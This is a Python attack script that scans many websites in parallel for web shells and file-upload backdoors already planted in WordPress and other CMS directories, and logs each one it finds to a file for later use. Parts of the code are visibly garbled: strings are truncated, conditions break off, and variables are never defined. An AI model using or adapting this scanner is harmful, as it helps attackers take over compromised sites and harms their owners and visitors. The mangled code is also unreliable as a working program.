#!/usr/bin/env python # -*- coding: utf-8 -*- import sys , requests, re , string , random , hashlib from multiprocessing.dummy import Pool from colorama import Fore,Style from colorama import init init(autoreset=True) reset = Style.RESET_ALL fr = Fore.RED fc = Fore.CYAN fw = Fore.WHITE fg = Fore.GREEN fm = Fore.MAGENTA Paths = ["/wp-content/uploads/","/wp-includes/","/wp-includes/css/","/wp-includes/ID3/","/wp-includes/IXR/","/wp-includes/Requests/","/wp-includes/SimplePie/","/wp-includes/Text/","/wp-content/mu-plugins-old/","/wp-content/themes/classic/inc/","/wp-content/plugins/ninja-forms/","/wp-content/mu-plugins/","/wp-includes/Text/Diff/Renderer/","/wp-includes/blocks/","/wp-includes/certificates/","/wp-includes/customize/","/wp-includes/fonts/","/wp-includes/images/","/.well-known/","/ALFA_DATA/","/.well-knownold/","/.well-known/acme-challenge/","/.well-known/","/cgi-bin/","/ALFA_DATA/","/.well-knownold/","/.well-known/acme-challenge/","/.well-known/","/uploads/","/upload/","/admin/uploads/","/Admin/uploads/","/admin/","/images/","/assets/","/vendor/phpunit/phpunit/src/Util/PHP/","/upload/image/","/assets/images/","/Public/","/vendor/","/local/","/modules/","/Site/","/system/","/template/","/shop/","/files/","/admin/editor/","/include/","/Assets/","/images/stories/","/plugins/","/php/","/wp-includes/assets/","/wp-includes/Text/Diff/Engine/","/wp-includes/block-patterns/","/wp-includes/Text/Diff/","/wp-includes/block-supports/","/wp-includes/blocks/","/wp-includes/certificates/","/wp-includes/SimplePie/Cache/","/wp-includes/SimplePie/Content/Type/","/wp-includes/css/","/wp-includes/SimplePie/Content/","/wp-includes/rest-api/endpoints/","/wp-includes/rest-api/fields/","/wp-includes/Requests/Cookie/","/wp-includes/Requests/Proxy/","/wp-includes/Requests/Response/","/wp-includes/Requests/Transport/","/wp-includes/Requests/Utility/","/wp-includes/js/codemirror/","/wp-includes/Requests/Exception/HTTP/","/wp-includes/js/crop/","/wp-includes/images/crystal/","/wp-includes/images/media/","/wp-includes/images/smilies/","/wp-includes/images/wlw/","/wp-includes/rest-api/search/","/wp-includes/Requests/Exception/","/wp-includes/Requests/Auth/","/wp-includes/sodium_compat/src/","/wp-includes/sitemaps/providers/","/wp-includes/Text/Diff/Engine/Engine/","/wp-includes/customize/","/wp-includes/fonts/","/wp-includes/html-api/","/wp-includes/ID3/","/wp-includes/images/","/wp-includes/IXR/","/wp-includes/js/","/wp-includes/php-compat/","/wp-includes/PHPMailer/","/wp-includes/pomo/","/wp-includes/random_compat/","/wp-includes/Requests/","/wp-includes/rest-api/","/wp-includes/SimplePie/","/wp-includes/sitemaps/","/wp-includes/sodium_compat/","/wp-includes/style-engine/","/wp-includes/Text/","/wp-includes/theme-compat/","/wp-includes/widgets/","/wp-admin/css/colors/ectoplasm/","/wp-admin/css/colors/","/admin/images/slider/","/admin/fckeditor/editor/filemanager/","/sites/default/files/","/admin/controller/extension/extension/","/modules/mod_simplefileuploadv1.3/elements/","/components/","/admin/uploads/images/","/wp-includes/js/","/wp-includes/pomo/","/wp-includes/rest-api/","/wp-includes/widgets/","/wp-admin/css/","/wp-admin/images/","/wp-admin/maint/","/wp-admin/meta/","/wp-admin/network/","/wp-admin/user/","/wp-content/","/wp-content/plugins/","/wp-content/themes/","/wp-admin/includes/","/wp-admin/","/wp-content/upgrade/"] Signs = ['form method="post" enctype="multipart/form-data">

Password: Password
') def URLdomain(site): if site.startswith("http://") : site = site.replace("http://","") elif site.startswith("https://") : site = site.replace("https://","") else : pass pattern = re.compile('(.*)/') while re.findall(pattern,site): sitez = re.findall(pattern,site) site = sitez[0] return site def ran(length): letters = string.ascii_lowercase return ''.join(random.choice(letters) for i in range(length)) def Exploit(domain,Path,i): try: exploit_point = "http://"+domain + Path checkShell = requests.get(exploit_point, verify=False,headers=headers,timeout=20).content checkShell = checkShell.lower() if ('type="file"' in checkShell or 'type=file' in checkShell) and 'multipart/form-data' in checkShell and ('method="post"' in checkShell or 'method=post' in checkShell) and ' {}[Succefully]').format(fc,fg) open('shells.txt', 'a').write(exploit_point +'\n') return True else: exploit_point = "https://"+domain + Path checkShell = requests.get(exploit_point, verify=False,headers=headers,timeout=20).content checkShell = checkShell.lower() if ('type="file"' in checkShell or 'type=file' in checkShell) and 'multipart/form-data' in checkShell and ('method="post"' in checkShell or 'method=post' in checkShell) and ' {}[Succefully]').format(fc,fg) open('shells.txt', 'a').write(exploit_point +'\n') return True else: print (' -| ' +exploit_point +' {}['+str(i)+'/'+str(len(Paths))+']'+ '{} --> {}[Failed]').format(fc,reset,fr) return False except Exception as e: print (' -| ' +"https://"+ domain +' {}['+str(i)+'/'+str(len(Paths))+']'+ ' --> {}[Failed]').format(fc,fr) return False def ExtractFiles(domain,Path,PageSource,i): try: regex = 'php">(.*).php' urlPath = 'http://'+domain+Path files = re.findall(regex, PageSource) for element in TrustedFiles: if element in files: files.remove(element) if len(files) == 0: print (' -| ' +urlPath +' {}['+str(i)+'/'+str(len(Paths))+']'+ '{} --> {}[Failed]').format(fc,reset,fr) return False if len(files) < 15: j = 0 FoundedShell= False while j {}[Failed]').format(fc,reset,fr) return False except: print ' -| ' + domain + ' --> {}[Failed]'.format(fr) return False def ExploreIndexOf(domain,Path,i): try: urlPath = 'http://'+domain+Path IndexOfPage = requests.get(urlPath,headers=headers , timeout=15 , allow_redirects=True).content if 'Index of' in IndexOfPage: return ExtractFiles(domain,Path,IndexOfPage,i) else: print (' -| ' +urlPath +' {}['+str(i)+'/'+str(len(Paths))+']'+ '{} --> {}[Failed]').format(fc,reset,fr) return False except : print (' -| ' +"http://"+ domain +' {}['+str(i)+'/'+str(len(Paths))+']'+ ' --> {}[Failed]').format(fc,fr) return False def main(url): try: i = 0 shellExist = False url = URLdomain(url) while i < len(Paths) and not shellExist: MyPath = Paths[i] if not MyPath.startswith('/'): MyPath = '/'+MyPath if '.php' in Paths[i] : if Exploit(url,MyPath,i): shellExist = True else: if not MyPath.endswith('/'): MyPath = MyPath + '/' if ExploreIndexOf(url,MyPath,i): shellExist = True i = i+1 except Exception as e: print ' -| ' + url + ' --> {}[Failed]'.format(fr) mp = Pool(100) mp.map(main, target) mp.close() mp.join() print '\n [!] {}Saved in shells.txt'.format(fc)